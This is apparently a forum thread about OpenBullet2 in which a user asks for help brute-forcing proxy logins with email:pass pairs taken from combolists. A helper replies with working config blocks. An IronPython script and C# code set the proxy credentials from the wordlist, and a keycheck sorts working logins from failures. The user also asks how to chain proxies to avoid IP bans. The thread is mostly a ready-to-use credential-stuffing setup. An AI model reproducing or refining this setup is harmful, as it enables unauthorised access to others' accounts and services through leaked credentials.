You cannot pass input.USERNAME to a script directly because it has a dot in the name so it cannot declare a variable with the same name in the script.
Please copy the value of input.USERNAME to a different variable first (e.g. using the constant string block) and then use that one. For example call it just USERNAME.
After that, you will need to search how to interpolate strings in python, and put the variable USERNAME in the correct place in your proxy string. You NEED to do this otherwise it will not replace any value.
I’m not familair with Python or any programming language.
I found this on Google and made it work for my case.
But I have no clue on how to interpolate it.
I found stuff on Google but cant make anything from it lol.
BLOCK:ConstantString
value = @input.USERNAME
SAFE
=> VAR @newUSER
ENDBLOCK
BLOCK:Script
INTERPRETER:IronPython
INPUT newUSER
BEGIN SCRIPT
import sys
sys.path.append('./src')
import urllib2
import json
proxy = urllib2.ProxyHandler({'http': 'http://newUSER:newPASS@privateip:8080'})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen('http://scratchpads.org/explore/sites-list')
html=response.read()
print html
END SCRIPT
OUTPUT String @html
ENDBLOCK
I basically want to brute force proxies using my own email:pass from combolists.
Thanks for your help Ruri, but its still sending as user:pass instead of the actuall user pass
Also, your code contained f’http:// which gave me an syntax error
GET http://scratchpads.org/explore/sites-list HTTP/1.1
Proxy-Authorization: Basic e25ld1VTRVJ9OntuZXdQQVNTfQ==
Host: scratchpads.org
User-Agent: Python-urllib/2.7
Connection: close
Accept-Encoding: identity
e25ld1VTRVJ9OntuZXdQQVNTfQ==
is {newUSER}:{newPASS}
I have no clue how to do this in OB2 without python, because for HTTP Request, theres only the global proxy from OB2 itself, not one set within the request.
I want to bruteforce proxies, and not “use” them.
Hope you understand what I mean haha
Ah yes sorry I forgot that’s the string interpolation in py3 but IronPython in OB2 is py2, so it would be something like this (please, search online for the correct syntax I don’t know python)
BLOCK:ConstantString
value = @input.USERNAME
=> VAR @newUSER
ENDBLOCK
BLOCK:ConstantString
value = @input.PASSWORD
=> VAR @newPASS
ENDBLOCK
BLOCK:Script
INTERPRETER:IronPython
INPUT newUSER,newPASS
BEGIN SCRIPT
import sys
sys.path.append('./src')
import urllib2
import json
proxy = urllib2.ProxyHandler({'http': "http://%s:%s@privateip:8080"%(newUSER, newPASS)})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen('http://scratchpads.org/explore/sites-list')
html=response.read()
print html
END SCRIPT
OUTPUT String @html
ENDBLOCK
data.UseProxy = true;
data.Proxy = new RuriLib.Models.Proxies.Proxy(
"privateip", // Put the IP here
8080, // This is the port
RuriLib.Models.Proxies.ProxyType.Http, // You can put Http, Socks4 or Socks5
input.USERNAME, // The username from the wordlist
input.PASSWORD); // The password from the wordlist
// The following request will be done via that proxy.
// If the proxy works it will have Example in the response, otherwise if
// there is an error the proxy doesn't work (wrong credentials).
TRY
BLOCK:HttpRequest
url = "https://example.com"
TYPE:STANDARD
$""
"application/x-www-form-urlencoded"
ENDBLOCK
CATCH
data.STATUS = "FAIL";
return;
END
BLOCK:Keycheck
KEYCHAIN FAIL OR
STRINGKEY @data.SOURCE DoesNotContain "Example"
KEYCHAIN SUCCESS OR
STRINGKEY @data.SOURCE Contains "Example"
ENDBLOCK
I was wondering if there’s a way to use proxies to brute-force proxies ?
Right now I am using a VPN, and switching IP’s is not ideal lol.
I remember something called Chain-Proxies, but I couldn’t find anything about it for OB2.